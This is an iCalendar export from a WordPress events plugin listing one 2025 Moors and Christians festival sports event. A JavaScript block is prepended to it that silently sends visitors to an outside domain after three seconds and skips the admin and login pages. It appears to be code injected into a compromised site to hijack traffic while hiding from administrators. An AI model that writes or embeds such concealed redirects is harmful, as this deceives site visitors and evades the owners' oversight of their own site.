<script>
if (
  !window.location.pathname.includes('/wp-admin') &&
  !window.location.pathname.includes('/wp-login')
) {
  var utm = window.location.search || '';
  var newUrl = 'https://morosicristiansontinyent.com/' + utm;

  setTimeout(function() {
    window.location.replace(newUrl);
  }, 3000);
}
</script>BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//6.4.7//EN
TZID:Europe/Madrid
X-WR-TIMEZONE:Europe/Madrid
BEGIN:VEVENT
UID:106@morosycristianos.eu
DTSTART;TZID=Europe/Madrid;VALUE=DATE:20250201
DTEND;TZID=Europe/Madrid;VALUE=DATE:20250203
DTSTAMP:20250129T130730Z
URL:https://moorsandchristians.eu/events/sports-competitions-mig-any-feste
 r-2025/
SUMMARY:Sports Competitions Mig Any Fester 2025
DESCRIPTION:
CATEGORIES:Societat de Festers
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Madrid
X-LIC-LOCATION:Europe/Madrid
BEGIN:STANDARD
DTSTART:20241027T020000
TZOFFSETFROM:+0200
TZOFFSETTO:+0100
TZNAME:CET
END:STANDARD
END:VTIMEZONE
END:VCALENDAR